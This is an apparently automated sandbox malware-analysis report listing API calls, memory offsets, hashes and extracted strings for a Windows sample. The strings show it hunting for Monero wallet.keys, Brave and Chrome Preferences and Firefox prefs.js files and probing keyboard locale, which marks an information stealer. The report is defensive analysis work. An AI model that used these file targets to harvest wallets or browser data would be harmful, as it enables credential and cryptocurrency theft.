                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                                          • String ID:
                                          • API String ID: 3550813701-0
                                          • Opcode ID: f0fbea52c114bec67b5a96e37e29fea3fb5af8c0100f71a0a1f5626e64e99a55
                                          • Instruction ID: 052b820198f520e34a289f9b64f68918f0ce4555714836b5950258ce6cf36c27
                                          • Opcode Fuzzy Hash: f0fbea52c114bec67b5a96e37e29fea3fb5af8c0100f71a0a1f5626e64e99a55
                                          • Instruction Fuzzy Hash: 65E012B5F15312A7CE1473B1AD0AB2A32DC9B1D349F042424FE45F7106FA2EF8008665
                                          APIs
                                          • wsprintfA.USER32 ref: 00EA38CC
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00EA38E3
                                          • lstrcat.KERNEL32(?,?), ref: 00EA3935
                                          • StrCmpCA.SHLWAPI(?,00EB0F70), ref: 00EA3947
                                          • StrCmpCA.SHLWAPI(?,00EB0F74), ref: 00EA395D
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00EA3C67
                                          • FindClose.KERNEL32(000000FF), ref: 00EA3C7C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                          • API String ID: 1125553467-2524465048
                                          • Opcode ID: 302f01fea8ad5f19588333a890493f915e2ff18a4e4ba6830a9674f2f29c4c72
                                          • Instruction ID: 1114c198d08628d483d5e35ab9f4bb06f251991f7badc83f97139f25804ce5fa
                                          • Opcode Fuzzy Hash: 302f01fea8ad5f19588333a890493f915e2ff18a4e4ba6830a9674f2f29c4c72
                                          • Instruction Fuzzy Hash: 6DA12171A00218DBDB34DBA4DC85FFA73B9BB89300F044589B94DAB145EB75AB84CF61
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • FindFirstFileA.KERNEL32(00000000,?,00EB0B32,00EB0B2B,00000000,?,?,?,00EB13F4,00EB0B2A), ref: 00E9BEF5
                                          • StrCmpCA.SHLWAPI(?,00EB13F8), ref: 00E9BF4D
                                          • StrCmpCA.SHLWAPI(?,00EB13FC), ref: 00E9BF63
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E9C7BF
                                          • FindClose.KERNEL32(000000FF), ref: 00E9C7D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                          • API String ID: 3334442632-726946144
                                          • Opcode ID: 58a2a205951c3e3cb7ab7bbaed80741f5a26616e02911c9f7f794f5cb58bcd5f
                                          • Instruction ID: 057edf5fbd4676ba2bf255f1f61bf187f02a1d25c0e5408e804a7135708133a0
                                          • Opcode Fuzzy Hash: 58a2a205951c3e3cb7ab7bbaed80741f5a26616e02911c9f7f794f5cb58bcd5f
                                          • Instruction Fuzzy Hash: 384256729102049BCF54FB70DD56EEE73BDAF89300F445569B906BA081EF34AB49CB92
                                          APIs
                                          • wsprintfA.USER32 ref: 00EA492C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00EA4943
                                          • StrCmpCA.SHLWAPI(?,00EB0FDC), ref: 00EA4971
                                          • StrCmpCA.SHLWAPI(?,00EB0FE0), ref: 00EA4987
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00EA4B7D
                                          • FindClose.KERNEL32(000000FF), ref: 00EA4B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: %s\%s$%s\%s$%s\*
                                          • API String ID: 180737720-445461498
                                          • Opcode ID: a3463d930dc137c24b273d5223ebad168a6d62a2bd0825dfed9d5439bdb80e2a
                                          • Instruction ID: 3c1670365783fd4da19140a746c899a0defe0c2edc4de206bdfb89c1232c7577
                                          • Opcode Fuzzy Hash: a3463d930dc137c24b273d5223ebad168a6d62a2bd0825dfed9d5439bdb80e2a
                                          • Instruction Fuzzy Hash: 6A6155B1A00219EBCB34EBA0DC45EFB73BCBB89700F004598B949A6145EB75AB45CF91
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EA4580
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA4587
                                          • wsprintfA.USER32 ref: 00EA45A6
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00EA45BD
                                          • StrCmpCA.SHLWAPI(?,00EB0FC4), ref: 00EA45EB
                                          • StrCmpCA.SHLWAPI(?,00EB0FC8), ref: 00EA4601
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00EA468B
                                          • FindClose.KERNEL32(000000FF), ref: 00EA46A0
                                          • lstrcat.KERNEL32(?,00BBFBA0), ref: 00EA46C5
                                          • lstrcat.KERNEL32(?,00BBE4A8), ref: 00EA46D8
                                          • lstrlen.KERNEL32(?), ref: 00EA46E5
                                          • lstrlen.KERNEL32(?), ref: 00EA46F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                          • String ID: %s\%s$%s\*
                                          • API String ID: 671575355-2848263008
                                          • Opcode ID: 75ff78f72675eafe750b2b882b7f39d6abc44e638fed09a19675c4e7a89f1075
                                          • Instruction ID: 78948d73fb55697b8579444f92feea659a58b5024f0cb11245c65dc92d32cc0d
                                          • Opcode Fuzzy Hash: 75ff78f72675eafe750b2b882b7f39d6abc44e638fed09a19675c4e7a89f1075
                                          • Instruction Fuzzy Hash: 565149B1A00218DBC774EB70DC89FEE737CAB59300F405588B949A7184DB75AB84CF91
                                          APIs
                                          • wsprintfA.USER32 ref: 00EA3EC3
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00EA3EDA
                                          • StrCmpCA.SHLWAPI(?,00EB0FAC), ref: 00EA3F08
                                          • StrCmpCA.SHLWAPI(?,00EB0FB0), ref: 00EA3F1E
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00EA406C
                                          • FindClose.KERNEL32(000000FF), ref: 00EA4081
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: %s\%s
                                          • API String ID: 180737720-4073750446
                                          • Opcode ID: 9a5215a619a4db3b2d9fe3bdd10b667292a5084f8cd246c39112ed406f30ba09
                                          • Instruction ID: af33566fcfd793bc06e573625e0fe19f21ff951dd4921192f0d796190cf66995
                                          • Opcode Fuzzy Hash: 9a5215a619a4db3b2d9fe3bdd10b667292a5084f8cd246c39112ed406f30ba09
                                          • Instruction Fuzzy Hash: AF5159B6A00218EBCB34EBB0DC85EFA73BCBB48300F445598B659A7044DB75AB85CF51
                                          APIs
                                          • wsprintfA.USER32 ref: 00E9ED3E
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00E9ED55
                                          • StrCmpCA.SHLWAPI(?,00EB1538), ref: 00E9EDAB
                                          • StrCmpCA.SHLWAPI(?,00EB153C), ref: 00E9EDC1
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E9F2AE
                                          • FindClose.KERNEL32(000000FF), ref: 00E9F2C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: %s\*.*
                                          • API String ID: 180737720-1013718255
                                          • Opcode ID: 6515f4bb145ee73810c2a5b1f8d102ed4f5ff65e1d4393ab1c7c6711caf42601
                                          • Instruction ID: adbc050767f68a800f2ca1960bbece0ee6f857e1269551609c5eb42b16398f42
                                          • Opcode Fuzzy Hash: 6515f4bb145ee73810c2a5b1f8d102ed4f5ff65e1d4393ab1c7c6711caf42601
                                          • Instruction Fuzzy Hash: EBE162729112189ADB98EB20CC56EEE73B8AF59300F4551E9B40B76052EF347F8ACF51
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EB15B8,00EB0D96), ref: 00E9F71E
                                          • StrCmpCA.SHLWAPI(?,00EB15BC), ref: 00E9F76F
                                          • StrCmpCA.SHLWAPI(?,00EB15C0), ref: 00E9F785
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E9FAB1
                                          • FindClose.KERNEL32(000000FF), ref: 00E9FAC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID: prefs.js
                                          • API String ID: 3334442632-3783873740
                                          • Opcode ID: 551ef16f1198918fc635b8a75e35e698e951cb190a60607483a79a38eb90c5ef
                                          • Instruction ID: 28bc6cd71079cf5847a4f84b98af069d992ba416a5de2ba5bd958c4c2898fc07
                                          • Opcode Fuzzy Hash: 551ef16f1198918fc635b8a75e35e698e951cb190a60607483a79a38eb90c5ef
                                          • Instruction Fuzzy Hash: C3B145719002049BCB68EF60DC55AEE73B9AF59300F4495B9F40AAB141EF357B49CF91
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EB510C,?,?,?,00EB51B4,?,?,00000000,?,00000000), ref: 00E91923
                                          • StrCmpCA.SHLWAPI(?,00EB525C), ref: 00E91973
                                          • StrCmpCA.SHLWAPI(?,00EB5304), ref: 00E91989
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E91D40
                                          • DeleteFileA.KERNEL32(00000000), ref: 00E91DCA
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E91E20
                                          • FindClose.KERNEL32(000000FF), ref: 00E91E32
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                          • String ID: \*.*
                                          • API String ID: 1415058207-1173974218
                                          • Opcode ID: ee552921f51d9582c4afeaecec61f9251e75b9321221430a8896e26d87477b2d
                                          • Instruction ID: 4273d112d625e7dbde3cb4fd99394f81e3bae072acfcc59fccbf55fb698add40
                                          • Opcode Fuzzy Hash: ee552921f51d9582c4afeaecec61f9251e75b9321221430a8896e26d87477b2d
                                          • Instruction Fuzzy Hash: AC1281729102189BCB58FB60DC96AEE73B8AF59300F4551A9B1077A091EF347F89CF91
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00EB0C2E), ref: 00E9DE5E
                                          • StrCmpCA.SHLWAPI(?,00EB14C8), ref: 00E9DEAE
                                          • StrCmpCA.SHLWAPI(?,00EB14CC), ref: 00E9DEC4
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E9E3E0
                                          • FindClose.KERNEL32(000000FF), ref: 00E9E3F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                          • String ID: \*.*
                                          • API String ID: 2325840235-1173974218
                                          • Opcode ID: b80f26f0ab19e0f0ee74bd2c9bd563b4abd8cf5c0a0a0147f3702f99d9fc118c
                                          • Instruction ID: 0f82cdf403a88d93bb4026c1350e2a20f8cce8e82ed310f51d27c38fb90034c9
                                          • Opcode Fuzzy Hash: b80f26f0ab19e0f0ee74bd2c9bd563b4abd8cf5c0a0a0147f3702f99d9fc118c
                                          • Instruction Fuzzy Hash: 6CF10E728102189ACB59EB60DC95AEE73B8BF59300F8561E9B40B76091EF347F4ACF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "}$"}$0'O}$@swy$J{$V|s$e+k$f@/$~w[_$D=
                                          • API String ID: 0-2876167696
                                          • Opcode ID: 5c10bfe552203f3b74e04914e580f338612775095bb72e5ffc6bf30e2faa5118
                                          • Instruction ID: 2f6ec6f092222a164f054e1ea3e2693f41288ffc5e2380c5744249b8bfdfa936
                                          • Opcode Fuzzy Hash: 5c10bfe552203f3b74e04914e580f338612775095bb72e5ffc6bf30e2faa5118
                                          • Instruction Fuzzy Hash: 1DB225F3A0C2049FE3046E2DEC8577ABBEAEF94360F1A453DE6C4C3744EA7559018696
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EB14B0,00EB0C2A), ref: 00E9DAEB
                                          • StrCmpCA.SHLWAPI(?,00EB14B4), ref: 00E9DB33
                                          • StrCmpCA.SHLWAPI(?,00EB14B8), ref: 00E9DB49
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E9DDCC
                                          • FindClose.KERNEL32(000000FF), ref: 00E9DDDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 3334442632-0
                                          • Opcode ID: ac8f4edcf827465330cdefcc41d67504b7c2e45ec2cf124f363bed024ae959a1
                                          • Instruction ID: aa64b2854e9063604fb34512181d7aae483468d8367a996b2312a217e1fb20e2
                                          • Opcode Fuzzy Hash: ac8f4edcf827465330cdefcc41d67504b7c2e45ec2cf124f363bed024ae959a1
                                          • Instruction Fuzzy Hash: F99145729002049BCF14FF70DC569FE73BCAB89300F459669B806BA145EF34AB09CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 9H9E$<X^$L.ot$VN:U$^$}G$uP;$zBzO$A{[
                                          • API String ID: 0-540469650
                                          • Opcode ID: 40689312aec328b67a625f13b0356ee94da427c3aa839608bda20b0add19530f
                                          • Instruction ID: 1c7c683f89dbdc3fea9bb187997b0a6b79981d4d3fecdabee8dcf51226dbaa00
                                          • Opcode Fuzzy Hash: 40689312aec328b67a625f13b0356ee94da427c3aa839608bda20b0add19530f
                                          • Instruction Fuzzy Hash: E9B216F3A0C2149FE3046E2DEC8567AFBE9EF94320F1A493DEAC4C7744E63558058696
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • GetKeyboardLayoutList.USER32(00000000,00000000,00EB05AF), ref: 00EA7BE1
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00EA7BF9
                                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00EA7C0D
                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00EA7C62
                                          • LocalFree.KERNEL32(00000000), ref: 00EA7D22
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                          • String ID: /
                                          • API String ID: 3090951853-4001269591
                                          • Opcode ID: e0953a57f8f8cb78437013ada208fe09c86e75ea4ad739178bdf6a244f1433b5
                                          • Instruction ID: 7a43c8b7e0062eaa3e8fa049b6de2062995b5e14e9246969ecc69be352410695
                                          • Opcode Fuzzy Hash: e0953a57f8f8cb78437013ada208fe09c86e75ea4ad739178bdf6a244f1433b5
                                          • Instruction Fuzzy Hash: 2F413B71941218ABDB64DF94DC99BEEB3B8FF49700F204199E40A7A181DB742F85CFA1
